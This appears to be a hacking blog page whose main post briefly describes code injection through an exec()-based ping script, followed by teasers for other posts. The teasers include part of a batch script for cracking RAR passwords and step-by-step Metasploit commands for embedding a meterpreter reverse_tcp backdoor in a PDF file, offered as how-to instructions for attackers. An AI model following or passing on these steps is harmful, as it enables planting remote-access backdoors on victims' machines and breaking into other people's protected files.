🌀Code Injection/Execution OR code injection attack

-
🌀Code Injection/Execution🌀

In this vulnerability an attacker maliciously takes advantage of a script which contains system functions/calls,to read or execute files on a remote server.This is synonymous to having a backdoor shell.Needless to say that under certain circumstances privilege escalation is possible.

Inthis example a script is using the exec()function to execute the ping command.However,the host is dynamic as it is being passed via an HTTP GET request:

Popular posts from this blog

⚠️List of terms used in the field of hacking.⚠️

-
Image
🚩Adware − Adware is software designed to force pre-chosen ads to display on your system. 🚩Attack − An attack is an action that is done on a system to get its access and extract sensitive data. 🚩Back door − A back door, or trap door, is a hidden entry to a computing device or software that bypasses security measures, such as logins and password protections. 🚩Bot − A bot is a program that automates an action so that it can be done repeatedly at a much higher rate for a more sustained period than a human operator could do it. For example, sending HTTP, FTP or Telnet at a higher rate or calling script to create objects at a higher rate. 🚩Botnet − A botnet, also known as zombie army, is a group of computers controlled without their owners’ knowledge. Botnets are used to send spam or make denial of service attacks. 🚩Brute force attack − A brute force attack is an automated and the simplest kind of method to gain access to a system or website. It tries different combinatio...
Read more

how to crack password of Rar File.

-
Image
__Step 1: Open Notepad__ Open your Notepad Start » Run » Type ”Notepad” » Enter Step 2: Create Batch File Copy The Following code in notepad. REM ============================================================ REM www.devkhilar.tech @echo off title Rar Password Cracker mode con: cols=47 lines=20 copy “C:\Program Files\WinRAR\Unrar.exe” SET PSWD=0 SET DEST=%TEMP%\%RANDOM% MD %DEST% :RAR cls echo ———————————————- echo GET DETAIL echo ———————————————- echo. SET/P “NAME=Enter File Name : ” IF “%NAME%”==”” goto NERROR goto GPATH :NERROR echo ———————————————- echo ERROR echo ———————————————- echo Sorry you can’t leave it blank. pause goto RAR :GPATH SET/P “PATH=Enter Full Path : ” IF “%PATH%”==”” goto PERROR goto NEXT :PERROR echo ———————————————- echo ERROR echo ———————————————- echo Sorry you can’t leave it blank. pause goto RAR :NEXT IF EXIST “%PATH%\%NAME%” GOTO START goto PATH :PATH cls echo ———————————————- echo ...
Read more

🔥How to Embed a backdoor in a PDF file❓

-
Image
🔥How to Embed a backdoor in a PDF file❓ Step 1)Run Metasploit Step2) Find the Appropriate Exploit. I will search metasploits database for an exploit for adobe pdf on windows, using this command: ●Code:msf > search type:exploit platform:windows adobe pdf You should see the exploit "exploit/windows/fileformat/adobe_pdf_embedded_exe", which we will use: ●Code:msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe Step 3) Set the Payload I will use the meterpreter payload again, because it is one of the most powerful payloads available to us: ●Code:msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp Step 4) Set the exploit options First, display the required options for the exploit: ●Code:msf > exploit (adobe_pdf_embedded_exe) > show options You can see that we must provide an existing PDF file to the INFILENAME option in which to embed the meterpreter payload. I will call it "hemantexample...
Read more